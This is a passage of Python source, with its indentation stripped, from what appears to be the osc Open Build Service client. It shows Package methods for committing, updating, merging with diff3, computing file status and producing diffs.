self.in_conflict.append(n)
def put_on_addlist(self, n):
if n not in self.to_be_added:
self.to_be_added.append(n)
def clear_from_conflictlist(self, n):
"""delete an entry from the file, and remove the file if it would be empty"""
if n in self.in_conflict:
filename = os.path.join(self.dir, n)
storefilename = os.path.join(self.storedir, n)
myfilename = os.path.join(self.dir, n + '.mine')
if self.islinkrepair() or self.ispulled():
upfilename = os.path.join(self.dir, n + '.new')
else:
upfilename = os.path.join(self.dir, n + '.r' + self.rev)
try:
os.unlink(myfilename)
# the working copy may be updated, so the .r* ending may be obsolete...
# then we don't care
os.unlink(upfilename)
if self.islinkrepair() or self.ispulled():
os.unlink(os.path.join(self.dir, n + '.old'))
except:
pass
self.in_conflict.remove(n)
self.write_conflictlist()
# XXX: this isn't used at all
def write_meta_mode(self):
# XXX: the "elif" is somehow a contradiction (with current and the old implementation
# it's not possible to "leave" the metamode again) (except if you modify pac.meta
# which is really ugly:) )
if self.meta:
store_write_string(self.absdir, '_meta_mode', '')
elif self.ismetamode():
os.unlink(os.path.join(self.storedir, '_meta_mode'))
def write_sizelimit(self):
if self.size_limit and self.size_limit <= 0:
try:
os.unlink(os.path.join(self.storedir, '_size_limit'))
except:
pass
else:
store_write_string(self.absdir, '_size_limit', str(self.size_limit) + '\n')
def write_addlist(self):
self.__write_storelist('_to_be_added', self.to_be_added)
def write_deletelist(self):
self.__write_storelist('_to_be_deleted', self.to_be_deleted)
def delete_source_file(self, n):
"""delete local a source file"""
self.delete_localfile(n)
self.delete_storefile(n)
def delete_remote_source_file(self, n):
"""delete a remote source file (e.g. from the server)"""
query = 'rev=upload'
u = makeurl(self.apiurl, ['source', self.prjname, self.name, pathname2url(n)], query=query)
http_DELETE(u)
def put_source_file(self, n, tdir, copy_only=False):
query = 'rev=repository'
tfilename = os.path.join(tdir, n)
shutil.copyfile(os.path.join(self.dir, n), tfilename)
# escaping '+' in the URL path (note: not in the URL query string) is
# only a workaround for ruby on rails, which swallows it otherwise
if not copy_only:
u = makeurl(self.apiurl, ['source', self.prjname, self.name, pathname2url(n)], query=query)
http_PUT(u, file = tfilename)
if n in self.to_be_added:
self.to_be_added.remove(n)
def __commit_update_store(self, tdir):
"""move files from transaction directory into the store"""
for filename in os.listdir(tdir):
os.rename(os.path.join(tdir, filename), os.path.join(self.storedir, filename))
def __generate_commitlist(self, todo_send):
root = ET.Element('directory')
for i in sorted(todo_send.keys()):
ET.SubElement(root, 'entry', name=i, md5=todo_send[i])
return root
@staticmethod
def commit_filelist(apiurl, project, package, filelist, msg='', user=None, **query):
"""send the commitlog and the local filelist to the server"""
if user is None:
user = conf.get_apiurl_usr(apiurl)
query.update({'cmd': 'commitfilelist', 'user': user, 'comment': msg})
u = makeurl(apiurl, ['source', project, package], query=query)
f = http_POST(u, data=ET.tostring(filelist, encoding=ET_ENCODING))
root = ET.parse(f).getroot()
return root
@staticmethod
def commit_get_missing(filelist):
"""returns list of missing files (filelist is the result of commit_filelist)"""
error = filelist.get('error')
if error is None:
return []
elif error != 'missing':
raise oscerr.APIError('commit_get_missing_files: '
'unexpected \'error\' attr: \'%s\'' % error)
todo = []
for n in filelist.findall('entry'):
name = n.get('name')
if name is None:
raise oscerr.APIError('missing \'name\' attribute:\n%s\n'
% ET.tostring(filelist, encoding=ET_ENCODING))
todo.append(n.get('name'))
return todo
def __send_commitlog(self, msg, local_filelist):
"""send the commitlog and the local filelist to the server"""
query = {}
if self.islink() and self.isexpanded():
query['keeplink'] = '1'
if conf.config['linkcontrol'] or self.isfrozen():
query['linkrev'] = self.linkinfo.srcmd5
if self.ispulled():
query['repairlink'] = '1'
query['linkrev'] = self.get_pulled_srcmd5()
if self.islinkrepair():
query['repairlink'] = '1'
return self.commit_filelist(self.apiurl, self.prjname, self.name,
local_filelist, msg, **query)
def commit(self, msg='', verbose=False, skip_local_service_run=False, can_branch=False, force=False):
# commit only if the upstream revision is the same as the working copy's
upstream_rev = self.latest_rev()
if self.rev != upstream_rev:
raise oscerr.WorkingCopyOutdated((self.absdir, self.rev, upstream_rev))
if not skip_local_service_run:
r = self.run_source_services(mode="trylocal", verbose=verbose)
if r is not 0:
# FIXME: it is better to raise this in Serviceinfo.execute with more
# information (like which service/command failed)
raise oscerr.ServiceRuntimeError('A service failed with error: %d' % r)
# check if it is a link, if so, branch the package
if self.is_link_to_different_project():
if can_branch:
orgprj = self.get_local_origin_project()
print("Branching {} from {} to {}".format(self.name, orgprj, self.prjname))
exists, targetprj, targetpkg, srcprj, srcpkg = branch_pkg(
self.apiurl, orgprj, self.name, target_project=self.prjname)
# update _meta and _files to sychronize the local package
# to the new branched one in OBS
self.update_local_pacmeta()
self.update_local_filesmeta()
else:
print("{} Not commited because is link to a different project".format(self.name))
return 1
if not self.todo:
self.todo = [i for i in self.to_be_added if not i in self.filenamelist] + self.filenamelist
pathn = getTransActPath(self.dir)
todo_send = {}
todo_delete = []
real_send = []
for filename in self.filenamelist + [i for i in self.to_be_added if not i in self.filenamelist]:
if filename.startswith('_service:') or filename.startswith('_service_'):
continue
st = self.status(filename)
if st == 'C':
print('Please resolve all conflicts before committing using "osc resolved FILE"!')
return 1
elif filename in self.todo:
if st in ('A', 'R', 'M'):
todo_send[filename] = dgst(os.path.join(self.absdir, filename))
real_send.append(filename)
print(statfrmt('Sending', os.path.join(pathn, filename)))
elif st in (' ', '!', 'S'):
if st == '!' and filename in self.to_be_added:
print('file \'%s\' is marked as \'A\' but does not exist' % filename)
return 1
f = self.findfilebyname(filename)
if f is None:
raise oscerr.PackageInternalError(self.prjname, self.name,
'error: file \'%s\' with state \'%s\' is not known by meta' \
% (filename, st))
todo_send[filename] = f.md5
elif st == 'D':
todo_delete.append(filename)
print(statfrmt('Deleting', os.path.join(pathn, filename)))
elif st in ('R', 'M', 'D', ' ', '!', 'S'):
# ignore missing new file (it's not part of the current commit)
if st == '!' and filename in self.to_be_added:
continue
f = self.findfilebyname(filename)
if f is None:
raise oscerr.PackageInternalError(self.prjname, self.name,
'error: file \'%s\' with state \'%s\' is not known by meta' \
% (filename, st))
todo_send[filename] = f.md5
if not force and not real_send and not todo_delete and not self.islinkrepair() and not self.ispulled():
print('nothing to do for package %s' % self.name)
return 1
print('Transmitting file data', end=' ')
filelist = self.__generate_commitlist(todo_send)
sfilelist = self.__send_commitlog(msg, filelist)
send = self.commit_get_missing(sfilelist)
real_send = [i for i in real_send if not i in send]
# abort after 3 tries
tries = 3
tdir = None
try:
tdir = os.path.join(self.storedir, '_in_commit')
if os.path.isdir(tdir):
shutil.rmtree(tdir)
os.mkdir(tdir)
while len(send) and tries:
for filename in send[:]:
sys.stdout.write('.')
sys.stdout.flush()
self.put_source_file(filename, tdir)
send.remove(filename)
tries -= 1
sfilelist = self.__send_commitlog(msg, filelist)
send = self.commit_get_missing(sfilelist)
if len(send):
raise oscerr.PackageInternalError(self.prjname, self.name,
'server does not accept filelist:\n%s\nmissing:\n%s\n' \
% (ET.tostring(filelist, encoding=ET_ENCODING), ET.tostring(sfilelist, encoding=ET_ENCODING)))
# these files already exist on the server
for filename in real_send:
self.put_source_file(filename, tdir, copy_only=True)
# update store with the committed files
self.__commit_update_store(tdir)
finally:
if tdir is not None and os.path.isdir(tdir):
shutil.rmtree(tdir)
self.rev = sfilelist.get('rev')
print()
print('Committed revision %s.' % self.rev)
if self.ispulled():
os.unlink(os.path.join(self.storedir, '_pulled'))
if self.islinkrepair():
os.unlink(os.path.join(self.storedir, '_linkrepair'))
self.linkrepair = False
# XXX: mark package as invalid?
print('The source link has been repaired. This directory can now be removed.')
if self.islink() and self.isexpanded():
li = Linkinfo()
li.read(sfilelist.find('linkinfo'))
if li.xsrcmd5 is None:
raise oscerr.APIError('linkinfo has no xsrcmd5 attr:\n%s\n' % ET.tostring(sfilelist, encoding=ET_ENCODING))
sfilelist = ET.fromstring(self.get_files_meta(revision=li.xsrcmd5))
for i in sfilelist.findall('entry'):
if i.get('name') in self.skipped:
i.set('skipped', 'true')
store_write_string(self.absdir, '_files', ET.tostring(sfilelist, encoding=ET_ENCODING) + '\n')
for filename in todo_delete:
self.to_be_deleted.remove(filename)
self.delete_storefile(filename)
self.write_deletelist()
self.write_addlist()
self.update_datastructs()
print_request_list(self.apiurl, self.prjname, self.name)
# FIXME: add testcases for this codepath
sinfo = sfilelist.find('serviceinfo')
if sinfo is not None:
print('Waiting for server side source service run')
u = makeurl(self.apiurl, ['source', self.prjname, self.name])
while sinfo is not None and sinfo.get('code') == 'running':
sys.stdout.write('.')
sys.stdout.flush()
# does it make sense to add some delay?
sfilelist = ET.fromstring(http_GET(u).read())
# if sinfo is None another commit might have occured in the "meantime"
sinfo = sfilelist.find('serviceinfo')
print('')
rev = self.latest_rev()
self.update(rev=rev)
elif self.get_local_meta() is None:
# if this was a newly added package there is no _meta
# file
self.update_local_pacmeta()
def __write_storelist(self, name, data):
if len(data) == 0:
try:
os.unlink(os.path.join(self.storedir, name))
except:
pass
else:
store_write_string(self.absdir, name, '%s\n' % '\n'.join(data))
def write_conflictlist(self):
self.__write_storelist('_in_conflict', self.in_conflict)
def updatefile(self, n, revision, mtime=None):
filename = os.path.join(self.dir, n)
storefilename = os.path.join(self.storedir, n)
origfile_tmp = os.path.join(self.storedir, '_in_update', '%s.copy' % n)
origfile = os.path.join(self.storedir, '_in_update', n)
if os.path.isfile(filename):
shutil.copyfile(filename, origfile_tmp)
os.rename(origfile_tmp, origfile)
else:
origfile = None
get_source_file(self.apiurl, self.prjname, self.name, n, targetfilename=storefilename,
revision=revision, progress_obj=self.progress_obj, mtime=mtime, meta=self.meta)
shutil.copyfile(storefilename, filename)
if mtime:
utime(filename, (-1, mtime))
if not origfile is None:
os.unlink(origfile)
def mergefile(self, n, revision, mtime=None):
filename = os.path.join(self.dir, n)
storefilename = os.path.join(self.storedir, n)
myfilename = os.path.join(self.dir, n + '.mine')
upfilename = os.path.join(self.dir, n + '.r' + self.rev)
origfile_tmp = os.path.join(self.storedir, '_in_update', '%s.copy' % n)
origfile = os.path.join(self.storedir, '_in_update', n)
shutil.copyfile(filename, origfile_tmp)
os.rename(origfile_tmp, origfile)
os.rename(filename, myfilename)
get_source_file(self.apiurl, self.prjname, self.name, n,
revision=revision, targetfilename=upfilename,
progress_obj=self.progress_obj, mtime=mtime, meta=self.meta)
if binary_file(myfilename) or binary_file(upfilename):
# don't try merging
shutil.copyfile(upfilename, filename)
shutil.copyfile(upfilename, storefilename)
os.unlink(origfile)
self.in_conflict.append(n)
self.write_conflictlist()
return 'C'
else:
# try merging
# diff3 OPTIONS... MINE OLDER YOURS
merge_cmd = 'diff3 -m -E %s %s %s > %s' % (myfilename, storefilename, upfilename, filename)
ret = run_external(merge_cmd, shell=True)
# "An exit status of 0 means `diff3' was successful, 1 means some
# conflicts were found, and 2 means trouble."
if ret == 0:
# merge was successful... clean up
shutil.copyfile(upfilename, storefilename)
os.unlink(upfilename)
os.unlink(myfilename)
os.unlink(origfile)
return 'G'
elif ret == 1:
# unsuccessful merge
shutil.copyfile(upfilename, storefilename)
os.unlink(origfile)
self.in_conflict.append(n)
self.write_conflictlist()
return 'C'
else:
raise oscerr.ExtRuntimeError('diff3 failed with exit code: %s' % ret, merge_cmd)
def update_local_filesmeta(self, revision=None):
"""
Update the local _files file in the store.
It is replaced with the version pulled from upstream.
"""
meta = self.get_files_meta(revision=revision)
store_write_string(self.absdir, '_files', meta + '\n')
def get_files_meta(self, revision='latest', skip_service=True):
fm = show_files_meta(self.apiurl, self.prjname, self.name, revision=revision, meta=self.meta)
# look for "too large" files according to size limit and mark them
root = ET.fromstring(fm)
for e in root.findall('entry'):
size = e.get('size')
if size and self.size_limit and int(size) > self.size_limit \
or skip_service and (e.get('name').startswith('_service:') or e.get('name').startswith('_service_')):
e.set('skipped', 'true')
return ET.tostring(root, encoding=ET_ENCODING)
def get_local_meta(self):
"""Get the local _meta file for the package."""
meta = store_read_file(self.absdir, '_meta')
return meta
def get_local_origin_project(self):
"""Get the originproject from the _meta file."""
# if the wc was checked out via some old osc version
# there might be no meta file: in this case we assume
# that the origin project is equal to the wc's project
meta = self.get_local_meta()
if meta is None:
return self.prjname
root = ET.fromstring(meta)
return root.get('project')
def is_link_to_different_project(self):
"""Check if the package is a link to a different project."""
if self.name == "_project":
return False
orgprj = self.get_local_origin_project()
return self.prjname != orgprj
def update_datastructs(self):
"""
Update the internal data structures if the local _files
file has changed (e.g. update_local_filesmeta() has been
called).
"""
import fnmatch
files_tree = read_filemeta(self.dir)
files_tree_root = files_tree.getroot()
self.rev = files_tree_root.get('rev')
self.srcmd5 = files_tree_root.get('srcmd5')
self.linkinfo = Linkinfo()
self.linkinfo.read(files_tree_root.find('linkinfo'))
self.serviceinfo = DirectoryServiceinfo()
self.serviceinfo.read(files_tree_root.find('serviceinfo'))
self.filenamelist = []
self.filelist = []
self.skipped = []
for node in files_tree_root.findall('entry'):
try:
f = File(node.get('name'),
node.get('md5'),
int(node.get('size')),
int(node.get('mtime')))
if node.get('skipped'):
self.skipped.append(f.name)
f.skipped = True
except:
# okay, a very old version of _files, which didn't contain any metadata yet...
f = File(node.get('name'), '', 0, 0)
self.filelist.append(f)
self.filenamelist.append(f.name)
self.to_be_added = read_tobeadded(self.absdir)
self.to_be_deleted = read_tobedeleted(self.absdir)
self.in_conflict = read_inconflict(self.absdir)
self.linkrepair = os.path.isfile(os.path.join(self.storedir, '_linkrepair'))
self.size_limit = read_sizelimit(self.dir)
self.meta = self.ismetamode()
# gather unversioned files, but ignore some stuff
self.excluded = []
for i in os.listdir(self.dir):
for j in conf.config['exclude_glob']:
if fnmatch.fnmatch(i, j):
self.excluded.append(i)
break
self.filenamelist_unvers = [ i for i in os.listdir(self.dir)
if i not in self.excluded
if i not in self.filenamelist ]
def islink(self):
"""tells us if the package is a link (has 'linkinfo').
A package with linkinfo is a package which links to another package.
Returns True if the package is a link, otherwise False."""
return self.linkinfo.islink()
def isexpanded(self):
"""tells us if the package is a link which is expanded.
Returns True if the package is expanded, otherwise False."""
return self.linkinfo.isexpanded()
def islinkrepair(self):
"""tells us if we are repairing a broken source link."""
return self.linkrepair
def ispulled(self):
"""tells us if we have pulled a link."""
return os.path.isfile(os.path.join(self.storedir, '_pulled'))
def isfrozen(self):
"""tells us if the link is frozen."""
return os.path.isfile(os.path.join(self.storedir, '_frozenlink'))
def ismetamode(self):
"""tells us if the package is in meta mode"""
return os.path.isfile(os.path.join(self.storedir, '_meta_mode'))
def get_pulled_srcmd5(self):
pulledrev = None
for line in open(os.path.join(self.storedir, '_pulled'), 'r'):
pulledrev = line.strip()
return pulledrev
def haslinkerror(self):
"""
Returns True if the link is broken otherwise False.
If the package is not a link it returns False.
"""
return self.linkinfo.haserror()
def linkerror(self):
"""
Returns an error message if the link is broken otherwise None.
If the package is not a link it returns None.
"""
return self.linkinfo.error
def hasserviceinfo(self):
"""
Returns True, if this package contains services.
"""
return self.serviceinfo.lsrcmd5 is not None or self.serviceinfo.xsrcmd5 is not None
def update_local_pacmeta(self):
"""
Update the local _meta file in the store.
It is replaced with the version pulled from upstream.
"""
meta = show_package_meta(self.apiurl, self.prjname, self.name)
if meta != "":
# is empty for _project for example
meta = ''.join(meta)
store_write_string(self.absdir, '_meta', meta + '\n')
def findfilebyname(self, n):
for i in self.filelist:
if i.name == n:
return i
def get_status(self, excluded=False, *exclude_states):
global store
todo = self.todo
if not todo:
todo = self.filenamelist + self.to_be_added + \
[i for i in self.filenamelist_unvers if not os.path.isdir(os.path.join(self.absdir, i))]
if excluded:
todo.extend([i for i in self.excluded if i != store])
todo = set(todo)
res = []
for fname in sorted(todo):
st = self.status(fname)
if not st in exclude_states:
res.append((st, fname))
return res
def status(self, n):
"""
status can be:
file storefile file present STATUS
exists exists in _files
x - - 'A' and listed in _to_be_added
x x - 'R' and listed in _to_be_added
x x x ' ' if digest differs: 'M'
and if in conflicts file: 'C'
x - - '?'
- x x 'D' and listed in _to_be_deleted
x x x 'D' and listed in _to_be_deleted (e.g. if deleted file was modified)
x x x 'C' and listed in _in_conflict
x - x 'S' and listed in self.skipped
- - x 'S' and listed in self.skipped
- x x '!'
- - - NOT DEFINED
"""
known_by_meta = False
exists = False
exists_in_store = False
localfile = os.path.join(self.absdir, n)
if n in self.filenamelist:
known_by_meta = True
if os.path.exists(localfile):
exists = True
if os.path.exists(os.path.join(self.storedir, n)):
exists_in_store = True
if n in self.to_be_deleted:
state = 'D'
elif n in self.in_conflict:
state = 'C'
elif n in self.skipped:
state = 'S'
elif n in self.to_be_added and exists and exists_in_store:
state = 'R'
elif n in self.to_be_added and exists:
state = 'A'
elif exists and exists_in_store and known_by_meta:
filemeta = self.findfilebyname(n)
state = ' '
if conf.config['status_mtime_heuristic']:
if os.path.getmtime(localfile) != filemeta.mtime and dgst(localfile) != filemeta.md5:
state = 'M'
elif dgst(localfile) != filemeta.md5:
state = 'M'
elif n in self.to_be_added and not exists:
state = '!'
elif not exists and exists_in_store and known_by_meta and not n in self.to_be_deleted:
state = '!'
elif exists and not exists_in_store and not known_by_meta:
state = '?'
elif not exists_in_store and known_by_meta:
# XXX: this codepath shouldn't be reached (we restore the storefile
# in update_datastructs)
raise oscerr.PackageInternalError(self.prjname, self.name,
'error: file \'%s\' is known by meta but no storefile exists.\n'
'This might be caused by an old wc format. Please backup your current\n'
'wc and checkout the package again. Afterwards copy all files (except the\n'
'.osc/ dir) into the new package wc.' % n)
elif os.path.islink(localfile):
# dangling symlink, whose name is _not_ tracked: treat it
# as unversioned
state = '?'
else:
# this case shouldn't happen (except there was a typo in the filename etc.)
raise oscerr.OscIOError(None, 'osc: \'%s\' is not under version control' % n)
return state
def get_diff(self, revision=None, ignoreUnversioned=False):
import tempfile
diff_hdr = 'Index: %s\n'
diff_hdr += '===================================================================\n'
kept = []
added = []
deleted = []
def diff_add_delete(fname, add, revision):
diff = []
diff.append(diff_hdr % fname)
tmpfile = None
origname = fname
if add:
diff.append('--- %s\t(revision 0)\n' % fname)
rev = 'revision 0'
if revision and not fname in self.to_be_added:
rev = 'working copy'
diff.append('+++ %s\t(%s)\n' % (fname, rev))
fname = os.path.join(self.absdir, fname)
else:
diff.append('--- %s\t(revision %s)\n' % (fname, revision or self.rev))
diff.append('+++ %s\t(working copy)\n' % fname)
fname = os.path.join(self.storedir, fname)
try:
if revision is not None and not add:
(fd, tmpfile) = tempfile.mkstemp(prefix='osc_diff')
get_source_file(self.apiurl, self.prjname, self.name, origname, tmpfile, revision)
fname = tmpfile
if binary_file(fname):
what = 'added'
if not add:
what = 'deleted'
diff = diff[:1]
diff.append('Binary file \'%s\' %s.\n' % (origname, what))
return diff
tmpl = '+%s'
ltmpl = '@@ -0,0 +1,%d @@\n'
if not add:
tmpl = '-%s'
ltmpl = '@@ -1,%d +0,0 @@\n'
lines = [tmpl % i for i in open(fname, 'r').readlines()]
if len(lines):
diff.append(ltmpl % len(lines))
if not lines[-1].endswith('\n'):
lines.append('\n\\ No newline at end of file\n')
diff.extend(lines)
finally:
if tmpfile is not None:
os.close(fd)
os.unlink(tmpfile)
return diff
if revision is None:
todo = self.todo or [i for i in self.filenamelist if not i in self.to_be_added]+self.to_be_added
for fname in todo:
if fname in self.to_be_added and self.status(fname) == 'A':
added.append(fname)
elif fname in self.to_be_deleted:
deleted.append(fname)
elif fname in self.filenamelist:
kept.append(self.findfilebyname(fname))
elif fname in self.to_be_added and self.status(fname) == '!':
raise oscerr.OscIOError(None, 'file \'%s\' is marked as \'A\' but does not exist\n'\
'(either add the missing file or revert it)' % fname)
elif not ignoreUnversioned:
raise oscerr.OscIOError(None, 'file \'%s\' is not under version control' % fname)
else:
fm = self.get_files_meta(revision=revision)
root = ET.fromstring(fm)
rfiles = self.__get_files(root)
# swap added and deleted
kept, deleted, added, services = self.__get_rev_changes(rfiles)
added = [f.name for f in added]
added.extend([f for f in self.to_be_added if not f in kept])
deleted = [f.name for f in deleted]
deleted.extend(self.to_be_deleted)
for f in added[:]:
if f in deleted:
added.remove(f)
deleted.remove(f)
# print kept, added, deleted
for f in kept:
state = self.status(f.name)
if state in ('S', '?', '!'):
continue
elif state == ' ' and revision is None:
continue
elif revision and self.findfilebyname(f.name).md5 == f.md5 and state != 'M':
continue
yield [diff_hdr % f.name]
if revision is None:
yield get_source_file_diff(self.absdir, f.name, self.rev)
else:
tmpfile = None
diff = []
try:
(fd, tmpfile) = tempfile.mkstemp(prefix='osc_diff')
get_source_file(self.apiurl, self.prjname, self.name, f.name, tmpfile, revision)
diff = get_source_file_diff(self.absdir, f.name, revision,
os.path.basename(tmpfile), os.path.dirname(tmpfile), f.name)
finally:
if tmpfile is not None:
os.close(fd)
os.unlink(tmpfile)
yield diff
for f in added:
yield diff_add_delete(f, True, revision)
for f in deleted:
yield diff_add_delete(f, False, revision)
def merge(self, otherpac):
self.todo += otherpac.todo
def __str__(self):
r = """
name: %s
prjname: %s
workingdir: %s
localfilelist: %s
linkinfo: %s
rev: %s
'todo' files: %s
""" % (self.name,
self.prjname,
self.dir,
'\n '.join(self.filenamelist),
self.linkinfo,
self.rev,
self.todo)
return r
def read_meta_from_spec(self, spec = None):
import glob
if spec:
specfile = spec
else:
# scan for spec files
speclist = glob.glob(os.path.join(self.dir, '*.spec'))
if len(speclist) == 1:
specfile = speclist[0]
elif len(speclist) > 1:
print('the following specfiles were found:')
for filename in speclist:
print(filename)
print('please specify one with --specfile')
sys.exit(1)
else:
print('no specfile was found - please specify one ' \
'with --specfile')
sys.exit(1)
data = read_meta_from_spec(specfile, 'Summary', 'Url', '%description')
self.summary = data.get('Summary', '')
self.url = data.get('Url', '')
self.descr = data.get('%description', '')
def update_package_meta(self, force=False):
"""
for the updatepacmetafromspec subcommand
argument force supress the confirm question
"""
m = ''.join(show_package_meta(self.apiurl, self.prjname, self.name))
root = ET.fromstring(m)
root.find('title').text = self.summary
root.find('description').text = ''.join(self.descr)
url = root.find('url')
if url == None:
url = ET.SubElement(root, 'url')
url.text = self.url
u = makeurl(self.apiurl, ['source', self.prjname, self.name, '_meta'])
mf = metafile(u, ET.tostring(root, encoding=ET_ENCODING))
if not force:
print('*' * 36, 'old', '*' * 36)
print(m)
print('*' * 36, 'new', '*' * 36)
print(ET.tostring(root, encoding=ET_ENCODING))
print('*' * 72)
repl = raw_input('Write? (y/N/e) ')
else:
repl = 'y'
if repl == 'y':
mf.sync()
elif repl == 'e':
mf.edit()
mf.discard()
def mark_frozen(self):
store_write_string(self.absdir, '_frozenlink', '')
print()
print("The link in this package (\"%s\") is currently broken. Checking" % self.name)
print("out the last working version instead; please use 'osc pull'")
print("to merge the conflicts.")
print()
def unmark_frozen(self):
if os.path.exists(os.path.join(self.storedir, '_frozenlink')):
os.unlink(os.path.join(self.storedir, '_frozenlink'))
def latest_rev(self, include_service_files=False, expand=False):
# if expand is True the xsrcmd5 will be returned (even if the wc is unexpanded)
if self.islinkrepair():
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, linkrepair=1, meta=self.meta, include_service_files=include_service_files)
elif self.islink() and (self.isexpanded() or expand):
if self.isfrozen() or self.ispulled():
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, linkrev=self.linkinfo.srcmd5, meta=self.meta, include_service_files=include_service_files)
else:
try:
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, meta=self.meta, include_service_files=include_service_files)
except:
try:
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, linkrev=self.linkinfo.srcmd5, meta=self.meta, include_service_files=include_service_files)
except:
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, linkrev="base", meta=self.meta, include_service_files=include_service_files)
self.mark_frozen()
elif not self.islink() and expand:
upstream_rev = show_upstream_xsrcmd5(self.apiurl, self.prjname, self.name, meta=self.meta, include_service_files=include_service_files)
else:
upstream_rev = show_upstream_rev(self.apiurl, self.prjname, self.name, meta=self.meta, include_service_files=include_service_files)
return upstream_rev
def __get_files(self, fmeta_root):
f = []
if fmeta_root.get('rev') is None and len(fmeta_root.findall('entry')) > 0:
raise oscerr.APIError('missing rev attribute in _files:\n%s' % ''.join(ET.tostring(fmeta_root, encoding=ET_ENCODING)))
for i in fmeta_root.findall('entry'):
error = i.get('error')
if error is not None:
raise oscerr.APIError('broken files meta: %s' % error)
skipped = i.get('skipped') is not None
f.append(File(i.get('name'), i.get('md5'),
int(i.get('size')), int(i.get('mtime')), skipped))
return f
def __get_rev_changes(self, revfiles):
kept = []
added = []
deleted = []
services = []
revfilenames = []
for f in revfiles:
revfilenames.append(f.name)
# treat skipped like deleted files
if f.skipped:
if f.name.startswith('_service:'):
services.append(f)
else:
deleted.append(f)
continue
# treat skipped like added files
# problem: this overwrites existing files during the update
# (because skipped files aren't in self.filenamelist_unvers)
if f.name in self.filenamelist and not f.name in self.skipped:
kept.append(f)
else:
added.append(f)
for f in self.filelist:
if not f.name in revfilenames:
deleted.append(f)
return kept, added, deleted, services
def update_needed(self, sinfo):
# this method might return a false-positive (that is a True is returned,
# even though no update is needed) (for details, see comments below)
if self.islink():
if self.isexpanded():
# check if both revs point to the same expanded sources
# Note: if the package contains a _service file, sinfo.srcmd5's lsrcmd5
# points to the "expanded" services (xservicemd5) => chances
# for a false-positive are high, because osc usually works on the
# "unexpanded" services.
# Once the srcserver supports something like noservice=1, we can get rid of
# this false-positives (patch was already sent to the ml) (but this also
# requires some slight changes in osc)
return sinfo.get('srcmd5') != self.srcmd5
elif self.hasserviceinfo():
# check if we have expanded or unexpanded services
if self.serviceinfo.isexpanded():
return sinfo.get('lsrcmd5') != self.srcmd5
else:
# again, we might have a false-positive here, because
# a mismatch of the "xservicemd5"s does not neccessarily
# imply a change in the "unexpanded" services.
return sinfo.get('lsrcmd5') != self.serviceinfo.xsrcmd5
# simple case: unexpanded sources and no services
# self.srcmd5 should also work
return sinfo.get('lsrcmd5') != self.linkinfo.lsrcmd5
elif self.hasserviceinfo():
if self.serviceinfo.isexpanded():
return sinfo.get('srcmd5') != self.srcmd5
else:
# cannot handle this case, because the sourceinfo does not contain
# information about the lservicemd5. Once the srcserver supports
# a noservice=1 query parameter, we can handle this case.
return True
return sinfo.get('srcmd5') != self.srcmd5
def update(self, rev = None, service_files = False, size_limit = None):
import tempfile
rfiles = []
# size_limit is only temporary for this update
old_size_limit = self.size_limit
if not size_limit is None:
self.size_limit = int(size_limit)
if os.path.isfile(os.path.join(self.storedir, '_in_update', '_files')):
print('resuming broken update...')
root = ET.parse(os.path.join(self.storedir, '_in_update', '_files')).getroot()
rfiles = self.__get_files(root)
kept, added, deleted, services = self.__get_rev_changes(rfiles)
# check if we aborted in the middle of a file update
broken_file = os.listdir(os.path.join(self.storedir, '_in_update'))
broken_file.remove('_files')
if len(broken_file) == 1:
origfile = os.path.join(self.storedir, '_in_update', broken_file[0])
wcfile = os.path.join(self.absdir, broken_file[0])
origfile_md5 = dgst(origfile)
origfile_meta = self.findfilebyname(broken_file[0])
if origfile.endswith('.copy'):
# ok it seems we aborted at some point during the copy process
# (copy process == copy wcfile to the _in_update dir). remove file+continue
os.unlink(origfile)
elif self.findfilebyname(broken_file[0]) is None:
# should we remove this file from _in_update? if we don't
# the user has no chance to continue without removing the file manually
raise oscerr.PackageInternalError(self.prjname, self.name,
'\'%s\' is not known by meta but exists in \'_in_update\' dir')
elif os.path.isfile(wcfile) and dgst(wcfile) != origfile_md5:
(fd, tmpfile) = tempfile.mkstemp(dir=self.absdir, prefix=broken_file[0]+'.')
os.close(fd)
os.rename(wcfile, tmpfile)
os.rename(origfile, wcfile)
print('warning: it seems you modified \'%s\' after the broken ' \
'update. Restored original file and saved modified version ' \
'to \'%s\'.' % (wcfile, tmpfile))
elif not os.path.isfile(wcfile):
# this is strange... because it existed before the update. restore it
os.rename(origfile, wcfile)
else:
# everything seems to be ok
os.unlink(origfile)
elif len(broken_file) > 1:
raise oscerr.PackageInternalError(self.prjname, self.name, 'too many files in \'_in_update\' dir')
tmp = rfiles[:]
for f in tmp:
if os.path.exists(os.path.join(self.storedir, f.name)):
if dgst(os.path.join(self.storedir, f.name)) == f.md5:
if f in kept:
kept.remove(f)
elif f in added:
added.remove(f)
# this can't happen
elif f in deleted:
deleted.remove(f)
if not service_files:
services = []
self.__update(kept, added, deleted, services, ET.tostring(root, encoding=ET_ENCODING), root.get('rev'))
os.unlink(os.path.join(self.storedir, '_in_update', '_files'))
os.rmdir(os.path.join(self.storedir, '_in_update'))
# ok everything is ok (hopefully)...
fm = self.get_files_meta(revision=rev)
root = ET.fromstring(fm)
rfiles = self.__get_files(root)
store_write_string(self.absdir, '_files', fm + '\n', subdir='_in_update')
kept, added, deleted, services = self.__get_rev_changes(rfiles)
if not service_files:
services = []
self.__update(kept, added, deleted, services, fm, root.get('rev'))
os.unlink(os.path.join(self.storedir, '_in_update', '_files'))
if os.path.isdir(os.path.join(self.storedir, '_in_update')):
os.rmdir(os.path.join(self.storedir, '_in_update'))
self.size_limit = old_size_limit
def __update(self, kept, added, deleted, services, fm, rev):
pathn = getTransActPath(self.dir)
# check for conflicts with existing files
for f in added:
if f.name in self.filenamelist_unvers:
raise oscerr.PackageFileConflict(self.prjname, self.name, f.name,
'failed to add file \'%s\' file/dir with the same name already exists' % f.name)
# ok, the update can't fail due to existing files
for f in added:
self.updatefile(f.name, rev, f.mtime)
print(statfrmt('A', os.path.join(pathn, f.name)))
for f in deleted:
# if the storefile doesn't exist we're resuming an aborted update:
# the file was already deleted but we cannot know this
# OR we're processing a _service: file (simply keep the file)
if os.path.isfile(os.path.join(self.storedir, f.name)) and self.status(f.name) not in ('M', 'C'):
# if self.status(f.name) != 'M':
self.delete_localfile(f.name)
self.delete_storefile(f.name)
